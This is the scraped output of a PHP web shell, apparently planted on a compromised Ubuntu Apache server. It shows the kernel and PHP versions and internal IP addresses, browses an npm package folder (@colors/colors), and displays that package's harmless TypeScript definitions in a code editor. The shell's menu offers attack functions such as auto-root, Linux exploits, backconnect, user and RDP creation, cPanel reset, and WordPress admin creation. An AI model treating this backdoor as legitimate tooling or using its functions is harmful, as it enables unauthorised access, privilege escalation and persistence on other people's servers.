Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
@colors /
colors /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
themes
[ DIR ]
drwxrwxr-x
LICENSE
1.21
KB
-rw-rw-r--
README.md
4.38
KB
-rw-rw-r--
index.d.ts
4.1
KB
-rw-rw-r--
package.json
1.03
KB
-rw-rw-r--
safe.d.ts
2.58
KB
-rw-rw-r--
safe.js
248
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for @colors/colors 1.4+ // Project: https://github.com/Marak/colors.js // Definitions by: Bart van der Schoor <https://github.com/Bartvds>, Staffan Eketorp <https://github.com/staeke> // Definitions: https://github.com/DABH/colors.js export interface Color { (text: string): string; strip: Color; stripColors: Color; black: Color; red: Color; green: Color; yellow: Color; blue: Color; magenta: Color; cyan: Color; white: Color; gray: Color; grey: Color; brightRed: Color; brightGreen: Color; brightYellow: Color; brightBlue: Color; brightMagenta: Color; brightCyan: Color; brightWhite: Color; bgBlack: Color; bgRed: Color; bgGreen: Color; bgYellow: Color; bgBlue: Color; bgMagenta: Color; bgCyan: Color; bgWhite: Color; bgBrightRed: Color; bgBrightGreen: Color; bgBrightYellow: Color; bgBrightBlue: Color; bgBrightMagenta: Color; bgBrightCyan: Color; bgBrightWhite: Color; reset: Color; bold: Color; dim: Color; italic: Color; underline: Color; inverse: Color; hidden: Color; strikethrough: Color; rainbow: Color; zebra: Color; america: Color; trap: Color; random: Color; zalgo: Color; } export function enable(): void; export function disable(): void; export function setTheme(theme: any): void; export let enabled: boolean; export const strip: Color; export const stripColors: Color; export const black: Color; export const red: Color; export const green: Color; export const yellow: Color; export const blue: Color; export const magenta: Color; export const cyan: Color; export const white: Color; export const gray: Color; export const grey: Color; export const brightRed: Color; export const brightGreen: Color; export const brightYellow: Color; export const brightBlue: Color; export const brightMagenta: Color; export const brightCyan: Color; export const brightWhite: Color; export const bgBlack: Color; export const bgRed: Color; export const bgGreen: Color; export const bgYellow: Color; export const bgBlue: Color; export const bgMagenta: Color; export const bgCyan: Color; export const bgWhite: Color; export const bgBrightRed: Color; export const bgBrightGreen: Color; export const bgBrightYellow: Color; export const bgBrightBlue: Color; export const bgBrightMagenta: Color; export const bgBrightCyan: Color; export const bgBrightWhite: Color; export const reset: Color; export const bold: Color; export const dim: Color; export const italic: Color; export const underline: Color; export const inverse: Color; export const hidden: Color; export const strikethrough: Color; export const rainbow: Color; export const zebra: Color; export const america: Color; export const trap: Color; export const random: Color; export const zalgo: Color; declare global { interface String { strip: string; stripColors: string; black: string; red: string; green: string; yellow: string; blue: string; magenta: string; cyan: string; white: string; gray: string; grey: string; brightRed: string; brightGreen: string; brightYellow: string; brightBlue: string; brightMagenta: string; brightCyan: string; brightWhite: string; bgBlack: string; bgRed: string; bgGreen: string; bgYellow: string; bgBlue: string; bgMagenta: string; bgCyan: string; bgWhite: string; bgBrightRed: string; bgBrightGreen: string; bgBrightYellow: string; bgBrightBlue: string; bgBrightMagenta: string; bgBrightCyan: string; bgBrightWhite: string; reset: string; // @ts-ignore bold: string; dim: string; italic: string; underline: string; inverse: string; hidden: string; strikethrough: string; rainbow: string; zebra: string; america: string; trap: string; random: string; zalgo: string; } }
Close